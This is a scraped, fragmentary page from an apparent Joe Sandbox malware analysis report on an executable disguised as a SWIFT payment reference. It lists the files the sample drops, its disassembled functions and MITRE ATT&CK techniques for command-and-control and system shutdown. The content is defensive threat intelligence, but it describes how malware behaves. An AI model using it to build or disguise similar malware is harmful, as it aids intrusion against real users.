Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Pictures\timetallenes.lnk

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\Vitis.exe

C:\Users\user\AppData\Local\Temp\Vitis.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_af3as4dx.pex.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ng2smkti.dbo.psm1

C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Noncausal.tre

C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff

C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\mymarid.ost

C:\Users\user\Pictures\timetallenes.lnk

C:\Windows\Resources\sans.lnk

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Function 004034F7 Relevance: 86.2, APIs: 33, Strings: 16, Instructions: 450
stringfilecomCOMMON

Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C13 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403BB6 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 00406544 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre